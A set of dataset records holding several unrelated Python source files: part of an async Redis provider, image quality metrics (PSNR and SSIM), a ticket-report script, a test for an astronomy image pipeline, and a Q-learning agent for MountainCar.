)\n except Exception as err:\n raise ProviderError(\"Redis Expiration Unknown Error: {}\".format(str(err)))\n\n async def expire_at(self, key, timestamp):\n try:\n return await self._connection.expireat(key, timestamp)\n except TypeError:\n raise ProviderError(\n \"Redis: wrong Expiration timestamp: {}\".format(str(timestamp))\n )\n except Exception as err:\n raise ProviderError(\"Redis Expiration Unknown Error: {}\".format(str(err)))\n\n async def setex(self, key, value, timeout):\n \"\"\"\n setex\n Set the value and expiration of a Key\n params:\n key: key Name\n value: value of the key\n timeout: expiration time in seconds\n \"\"\"\n if not self._connection:\n await self.connection()\n if not isinstance(timeout, int):\n time = 900\n else:\n time = timeout\n try:\n await self._connection.setex(key, time, value)\n except TypeError:\n raise ProviderError(\n \"Redis: wrong Expiration timestamp: {}\".format(str(timestamp))\n )\n except (aredis.exceptions.RedisError) as err:\n raise ProviderError(\"Redis SetEx Error: {}\".format(str(err)))\n except Exception as err:\n raise ProviderError(\"Redis SetEx Unknown Error: {}\".format(str(err)))\n\n def persist(self, key):\n \"\"\"\n persist\n Remove the expiration of a key\n \"\"\"\n try:\n return self._connection.persist(key)\n except Exception as err:\n raise ProviderError(\"Redis Expiration Unknown Error: {}\".format(str(err)))\n\n async def set_key(self, key, value):\n await self.set(key, value)\n\n async def get_key(self, key):\n return await self.get(key)\n\n \"\"\"\n Hash functions\n \"\"\"\n\n async def hmget(self, key, keys, *args):\n \"\"\"\n set the value of a key in field (redis dict)\n \"\"\"\n try:\n return await self._connection.hmget(key, keys, *args)\n except (aredis.exceptions.RedisError) as err:\n raise ProviderError(\"Redis Hmget Error: {}\".format(str(err)))\n except Exception as err:\n raise ProviderError(\"Redis Hmget Unknown Error: {}\".format(str(err)))\n\n async def hmset(self, key, mapping):\n \"\"\"\n set the value of a key in field (redis dict)\n \"\"\"\n try:\n await self._connection.hmset(key, mapping)\n except (aredis.exceptions.RedisError) as err:\n raise ProviderError(\"Redis Hmset Error: {}\".format(str(err)))\n except Exception as err:\n raise ProviderError(\"Redis Hmset Unknown Error: {}\".format(str(err)))\n\n async def hgetall(self, key):\n \"\"\"\n Get all the fields and values in a hash (redis dict)\n \"\"\"\n print(key, await self._connection.hgetall(key))\n try:\n return await self._connection.hgetall(key)\n except (aredis.exceptions.RedisError) as err:\n raise ProviderError(\"Redis Hmset Error: {}\".format(str(err)))\n except Exception as err:\n raise ProviderError(\"Redis Hmset Unknown Error: {}\".format(str(err)))\n\n async def hget(self, key, name):\n \"\"\"\n set the value of a key in field (redis dict)\n \"\"\"\n try:\n await self._connection.hget(key, name)\n except (aredis.exceptions.RedisError) as err:\n raise ProviderError(\"Redis Hget Error: {}\".format(str(err)))\n except Exception as err:\n raise ProviderError(\"Redis Hget Unknown Error: {}\".format(str(err)))\n\n async def set_hash(self, key, mapping):\n await self.hmset(key, mapping)\n\n async def get_hash(self, key, *args):\n return await self.hgetall(key, *args)\n\n async def hkeys(self, key):\n \"\"\"\n Get the keys in a hash (redis dict)\n \"\"\"\n try:\n return await self._connection.hkeys(key)\n except (aredis.exceptions.RedisError) as err:\n raise ProviderError(\"Redis Hmset Error: {}\".format(str(err)))\n except Exception as err:\n 
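# setex() above rebinds the name `time` (shadowing the module imported at the
# top of the file inside that method) and its TypeError branch formats an
# undefined variable (`timestamp`, copied from expire_at), so the error path
# itself raises NameError. A corrected standalone sketch keeping the 900 s
# default and aredis's argument order (name, time, value):
import aredis

async def setex(conn: aredis.StrictRedis, key, value, timeout=900):
    seconds = timeout if isinstance(timeout, int) else 900
    await conn.setex(key, seconds, value)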
raise ProviderError(\"Redis Hmset Unknown Error: {}\".format(str(err)))\n\n async def hvals(self, key):\n \"\"\"\n Get the keys in a hash (redis dict)\n \"\"\"\n try:\n return await self._connection.hkeys(key)\n except (aredis.exceptions.RedisError) as err:\n raise ProviderError(\"Redis Hmset Error: {}\".format(str(err)))\n except Exception as err:\n raise ProviderError(\"Redis Hmset Unknown Error: {}\".format(str(err)))\n\n async def keys(self, key):\n return await self.hkeys(key)\n\n async def values(self, key):\n return await self.hvals(key)\n\n async def hset(self, key, field, value):\n \"\"\"\n Set the string value of a hash field (redis dict)\n \"\"\"\n try:\n await self._connection.hset(key, field, value)\n except (aredis.exceptions.RedisError) as err:\n raise ProviderError(\"Redis Hset Error: {}\".format(str(err)))\n except Exception as err:\n raise ProviderError(\"Redis Hset Unknown Error: {}\".format(str(err)))\n\n async def hget(self, key, field):\n \"\"\"\n get the value of a hash field (redis dict)\n \"\"\"\n try:\n return await self._connection.hset(key, field)\n except (aredis.exceptions.RedisError) as err:\n raise ProviderError(\"Redis Hget Error: {}\".format(str(err)))\n except Exception as err:\n raise ProviderError(\"Redis Hget Unknown Error: {}\".format(str(err)))\n\n async def hexists(self, key, field, value):\n \"\"\"\n Determine if hash field exists on redis dict\n \"\"\"\n try:\n await self._connection.hexists(key, field)\n except (aredis.exceptions.RedisError) as err:\n raise ProviderError(\"Redis hash exists Error: {}\".format(str(err)))\n except Exception as err:\n raise ProviderError(\"Redis hash exists Unknown Error: {}\".format(str(err)))\n\n async def hdel(self, key, field, *fields):\n \"\"\"\n Delete one or more hash fields\n \"\"\"\n try:\n await self._connection.hdel(key, field, *fields)\n except (aredis.exceptions.RedisError) as err:\n raise ProviderError(\"Redis Hset Error: {}\".format(str(err)))\n except Exception as err:\n raise ProviderError(\"Redis Hset Unknown Error: {}\".format(str(err)))\n\n\n\"\"\"\nRegistering this Provider\n\"\"\"\nregisterProvider(asyncredis)\n","sub_path":"asyncdb/providers/asyncredis.py","file_name":"asyncredis.py","file_ext":"py","file_size_in_byte":20112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"562033173","text":"import torch\n\ndef psnr(mse):\n return -10 * torch.log10(mse)\n\ndef ssim(x, y, L=1, k1=0.01, k2=0.03):\n mx, my = x.mean(), y.mean()\n sx, sy = x.std(), y.std()\n vx, vy = sx ** 2, sy ** 2\n vxy = torch.sum((x - mx) * (y - my)) / (torch.numel(x) - 1)\n c1, c2 = (k1 * L) ** 2, (k2 * L) ** 2\n ssim = (2 * mx * my + c1) * (2 * vxy + c2) /(mx ** 2 + my ** 2 + c1) / (vx + vy +c2)\n return ssim","sub_path":"metric.py","file_name":"metric.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"106033945","text":"import csv\r\nimport pandas as pd\r\n \r\ndef weekly_file(df, tick_type): #Employee ticket counts\r\n emp_count = df[\"%s_Support_Name\"% tick_type].value_counts()\r\n return(emp_count)\r\n\r\ndef sla_time(df, tick_type): #SLA for current position. 
Checks for age of completed tickets\r\n w, x, y, z = 0, 0, 0, 0\r\n sla_len = df['%s_age'% tick_type].sort_values()\r\n for i in sla_len: #generic letters | will clean up in future\r\n if i <= 3:\r\n w+=1\r\n if i >= 4 and i <= 10:\r\n x+=1\r\n if i >=11 and i <= 20:\r\n y+=1\r\n if i >= 21:\r\n z+=1\r\n return(\"Within 3 days: {} Within 10 days: {} Within 20 days: {} Outside 21 days: {}\").format(w, x, y, z)\r\n\r\ndef closed_tickets(df, tick_type): #counts the amount of tickets closed and any duplicated tickets closed \r\n amt_clsd = df['%s_Closed_Date'% tick_type].count()\r\n dupticks = ['AP-Duplicate', ';----AP-Duplicate', 'Duplicate']\r\n selecwrds1 = df['%s_Log_Description' % tick_type].str.split(expand = True).stack()\r\n dupe_1 = selecwrds1[selecwrds1.isin(dupticks)]\r\n return(\" {} completed {} duplicates\").format(amt_clsd, sum(dupe_1.value_counts()))\r\n\r\n \r\n \r\ndf = pd.read_excel('**') #Insert file path here\r\ntick_type = input('WO or INC: ') #INC or WO based on remedy BMC SQL results\r\nweek_num = input('Report week # ')\r\n\r\n\r\nap_num = weekly_file(df, tick_type), sla_time(df, tick_type), closed_tickets(df, tick_type)\r\ncsv_file = week_num + '.csv'\r\nwith open(csv_file, 'w') as fp:\r\n ap_week = csv.writer(fp, delimiter= \",\")\r\n ap_week.writerow(ap_num)","sub_path":"excelparser.py","file_name":"excelparser.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"281000732","text":"# -*- mode: python; coding: utf-8 -*-\n# Copyright 2020 the AAS WorldWide Telescope project\n# Licensed under the MIT License.\n\nfrom __future__ import absolute_import, division, print_function\n\nimport numpy as np\nfrom numpy import testing as nt\nimport os.path\nimport pytest\nimport shutil\nimport sys\n\nfrom . import assert_xml_elements_equal, test_path\nfrom .. import cli\nfrom .. 
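# sla_time() above buckets ticket ages with a hand-rolled if-chain over the
# sorted column; pandas.cut expresses the same four buckets in one call (bin
# edges taken from the comparisons: <=3, 4-10, 11-20, >=21):
import pandas as pd

ages = pd.Series([1, 5, 12, 30, 2, 21])
buckets = pd.cut(ages, bins=[0, 3, 10, 20, float("inf")],
                 labels=["<=3 days", "4-10 days", "11-20 days", ">=21 days"])
print(buckets.value_counts().sort_index())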
import pipeline\nfrom ..pipeline import astropix\n\n\nclass LocalTestAstroPixImageSource(astropix.AstroPixImageSource):\n def query_candidates(self):\n # NB all these values are wrong for the input image!!!\n item = {\n \"creator\": \"Fake Observatory\",\n \"title\": \"Test\",\n \"description\": \"An amazing image.\",\n \"object_name\": [\"NGC 253\"],\n \"resource_url\": \"http://example.com/amazingimage.jpg\",\n \"reference_url\": \"https://public.nrao.edu/gallery/astronomers-capture-first-image-of-a-black-hole/\",\n \"image_id\": \"test1\",\n \"image_credit\": \"Courtesy an amazing telescope.\",\n \"wcs_coordinate_frame\": \"ICRS\",\n \"wcs_equinox\": \"J2000\",\n \"wcs_reference_value\": [\"187.70593075\", \"12.39112325\"],\n \"wcs_reference_dimension\": [\"2166.0\", \"2129.0\"],\n \"wcs_reference_pixel\": [\"3738.9937831\", \"3032.00448074\"],\n \"wcs_scale\": [\"-5.91663506907e-14\", \"5.91663506907e-14\"],\n \"wcs_rotation\": \"0\",\n \"wcs_projection\": \"TAN\",\n \"wcs_quality\": \"Full\",\n \"wcs_notes\": \"FAKE\",\n \"publisher\": \"FAKE\",\n \"publisher_id\": \"fake\",\n \"resource_id\": \"test1\",\n \"last_updated\": \"2019-04-08T14:00:38.128143\",\n \"metadata_version\": \"1.1\",\n \"image_width\": \"7416\",\n \"image_height\": \"4320\",\n \"image_max_boundry\": \"7416\",\n \"astropix_id\": 21642\n }\n yield astropix.AstroPixCandidateInput(item)\n\n def fetch_candidate(self, unique_id, cand_data_stream, cachedir):\n shutil.copy(test_path('NGC253ALMA.jpg'), os.path.join(cachedir, 'image.jpg'))\n\n\nclass TestPipeline(object):\n def setup_method(self, method):\n from tempfile import mkdtemp\n self.work_dir = mkdtemp()\n\n pipeline.IMAGE_SOURCE_CLASS_LOADERS['_local_test_astropix'] = lambda: LocalTestAstroPixImageSource\n\n os.makedirs(self.work_path('repo'))\n shutil.copy(test_path('toasty-pipeline-config.yaml'), self.work_path('repo'))\n\n def teardown_method(self, method):\n from shutil import rmtree\n rmtree(self.work_dir)\n\n def work_path(self, *pieces):\n return os.path.join(self.work_dir, *pieces)\n\n def test_workflow(self):\n args = [\n 'pipeline', 'init',\n '--local', self.work_path('repo'),\n self.work_path('work'),\n ]\n cli.entrypoint(args)\n\n args = [\n 'pipeline', 'refresh',\n '--workdir', self.work_path('work'),\n ]\n cli.entrypoint(args)\n\n args = [\n 'pipeline', 'fetch',\n '--workdir', self.work_path('work'),\n 'fake_test1', '*nomatchisok*',\n ]\n cli.entrypoint(args)\n\n args = [\n 'pipeline', 'process-todos',\n '--workdir', self.work_path('work'),\n ]\n cli.entrypoint(args)\n\n args = [\n 'pipeline', 'approve',\n '--workdir', self.work_path('work'),\n 'fake_test1', 'fake_test?',\n ]\n cli.entrypoint(args)\n\n args = [\n 'pipeline', 'publish',\n '--workdir', self.work_path('work'),\n ]\n cli.entrypoint(args)\n\n args = [\n 'pipeline', 'ignore-rejects',\n '--workdir', self.work_path('work'),\n ]\n cli.entrypoint(args)\n\n def test_args(self):\n with pytest.raises(SystemExit):\n args = [\n 'pipeline', 'init',\n self.work_path('work'),\n ]\n cli.entrypoint(args)\n\n with pytest.raises(SystemExit):\n args = [\n 'pipeline', 'init',\n '--azure-conn-env', 'NOTAVARIABLE',\n self.work_path('work'),\n ]\n cli.entrypoint(args)\n\n os.environ['FAKECONNSTRING'] = 'fake'\n\n with pytest.raises(SystemExit):\n args = [\n 'pipeline', 'init',\n '--azure-conn-env', 'FAKECONNSTRING',\n self.work_path('work'),\n ]\n 
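# setup_method() above plugs the fake image source in through a registry of
# zero-arg loaders keyed by name (IMAGE_SOURCE_CLASS_LOADERS); the same
# pattern in miniature, with illustrative names rather than toasty's real API:
LOADERS = {}

def register_loader(name, cls):
    LOADERS[name] = lambda: cls          # store a thunk, resolve lazily

class FakeSource:
    pass

register_loader("_local_test", FakeSource)
source_cls = LOADERS["_local_test"]()    # call the loader to get the class
print(source_cls is FakeSource)          # True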
cli.entrypoint(args)\n","sub_path":"toasty/tests/test_pipeline.py","file_name":"test_pipeline.py","file_ext":"py","file_size_in_byte":4533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"522980808","text":"from gym import make\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.utils.tensorboard import SummaryWriter\nimport copy\nfrom collections import deque\nimport random\nfrom tqdm import trange\n\nN_STEP = 1\nGAMMA = 0.9\n\nTRANSFORM_TO_FEATURE = True\nSTATE_SPACE_SIZE = None\nRADIAN_POINTS = np.linspace(-1, 1, 5)\n\n\ndef normalize_state(state):\n # [-1.2, 0.6] [-0.07, 0.07]\n state[0] = ((state[0] + 1.2) / (1.2 + 0.6) - 0.5) * 2\n state[1] = (state[1]) / 0.07\n return state\n\n\ndef transform_state(state):\n # result = []\n # result.extend(state)\n # return np.array(result)\n global STATE_SPACE_SIZE\n\n state = normalize_state(state)\n\n if not TRANSFORM_TO_FEATURE:\n STATE_SPACE_SIZE = 2\n return state\n else:\n\n result = []\n clone = state.clone()\n clone[1] = clone[1] * 20\n result.extend(clone)\n result.extend(torch.abs(clone))\n # for x in RADIAN_POINTS:\n # for speed in RADIAN_POINTS:\n # result.append(np.exp(-(state[0] - x) ** 2 - (state[1] - speed) ** 2))\n\n STATE_SPACE_SIZE = len(result)\n torch_result = torch.tensor(result)\n return torch_result\n\n\nMODIFIED_REWARD = True\n\n\ndef modified_reward(state, new_state, reward):\n if MODIFIED_REWARD:\n return reward + 300 * (GAMMA * abs(new_state[1]) - abs(state[1])) / 0.14 / 2\n else:\n return reward\n\n\ndef to2d(state):\n if len(state.shape) == 0:\n return state.view((1, 1))\n elif len(state.shape) == 1:\n return state.view((1, -1))\n elif len(state.shape) == 2:\n return state\n else:\n raise RuntimeError(f\"Case of the state shape: {state.shape} undefined\")\n\n\nclass AQL:\n def __init__(self, state_dim, action_dim, tensor_board_writer, lr=0.001):\n self._learn_step_counter = 0\n self._tensor_board_writer = tensor_board_writer\n self._action_dim = action_dim\n self._state_dim = state_dim\n self._gamma = GAMMA ** N_STEP\n self._lr = lr\n self._weight = torch.zeros((state_dim, action_dim), dtype=torch.double, requires_grad=True)\n self._bias = torch.zeros((1, action_dim), dtype=torch.double, requires_grad=True)\n self._loss = nn.MSELoss()\n self._optim = torch.optim.Adam([self._weight, self._bias], lr=lr, weight_decay=0.1)\n\n def update(self, transition):\n self._learn_step_counter += 1\n state, action, next_state, reward, done = transition\n state, next_state, reward = map(lambda x: torch.tensor(x, dtype=torch.double), (state, next_state, reward))\n state, next_state = map(transform_state, [state, next_state])\n state, next_state, reward = map(to2d, (state, next_state, reward))\n Q_function = next_state.matmul(self._weight) + self._bias\n target = reward + self._gamma * torch.max(Q_function).view((1, 1))\n loss = self._loss(Q_function[0, action], target.view(()))\n\n self._optim.zero_grad()\n loss.backward()\n self._optim.step()\n\n self._tensor_board_writer.add_scalar(\"loss\", loss.detach().item(), self._learn_step_counter)\n\n def act(self, state, target=False):\n state = torch.tensor(state)\n state = transform_state(state)\n state = to2d(state)\n with torch.no_grad():\n Q_function = torch.matmul(state, self._weight) + self._bias\n return np.argmax(Q_function.squeeze()).item()\n\n def save(self):\n weight = self._weight.detach().numpy()\n bias = self._bias.detach().numpy()\n np.savez(\"agent.npz\", weight, bias)\n\n\ndef 
create_generator_eps(start=0.1, finish=0.05, num_of_iter=8000):\n delta = (start - finish) / num_of_iter\n current = start\n while True:\n yield max(current, finish)\n current -= delta\n\n\nif __name__ == \"__main__\":\n with SummaryWriter(log_dir=\"runs/hw1\", purge_step=0) as writer:\n if STATE_SPACE_SIZE is None:\n transform_state(torch.tensor([0, 0])) # Mock\n env = make(\"MountainCar-v0\")\n aql = AQL(state_dim=STATE_SPACE_SIZE, action_dim=3, tensor_board_writer=writer)\n generator_eps = create_generator_eps()\n episodes = 200\n\n for i in trange(episodes):\n state = env.reset()\n total_reward = 0\n steps = 0\n done = False\n reward_buffer = deque(maxlen=N_STEP)\n state_buffer = deque(maxlen=N_STEP)\n action_buffer = deque(maxlen=N_STEP)\n while not done:\n if random.random() < next(generator_eps):\n action = env.action_space.sample()\n else:\n action = aql.act(state)\n next_state, reward, done, _ = env.step(action)\n reward = modified_reward(state, next_state, reward)\n total_reward += reward\n steps += 1\n reward_buffer.append(reward)\n state_buffer.append(state)\n action_buffer.append(action)\n if len(reward_buffer) == N_STEP:\n aql.update((state_buffer[0], action_buffer[0], next_state,\n sum([(GAMMA ** i) * r for i, r in enumerate(reward_buffer)]), done))\n state = next_state\n if len(reward_buffer) < N_STEP:\n rb = list(reward_buffer)\n for k in range(1, N_STEP):\n aql.update((state_buffer[k], action_buffer[k], next_state,\n sum([(GAMMA ** i) * r for i, r in enumerate(rb[k:])]), done))\n\n writer.add_scalar(\"reward\", total_reward, i)\n\n if i % 20 == 0:\n aql.save()\n","sub_path":"hw01_mountain_car/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
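# Endpoint check for the linear-decay epsilon schedule above, redefined here
# so the snippet runs standalone: it decays from `start` to `finish` over
# `num_of_iter` steps and then stays clamped at `finish`.
def eps_schedule(start=0.1, finish=0.05, num_of_iter=4):
    delta = (start - finish) / num_of_iter
    current = start
    while True:
        yield max(current, finish)
        current -= delta

gen = eps_schedule()
print([round(next(gen), 4) for _ in range(6)])
# -> [0.1, 0.0875, 0.075, 0.0625, 0.05, 0.05]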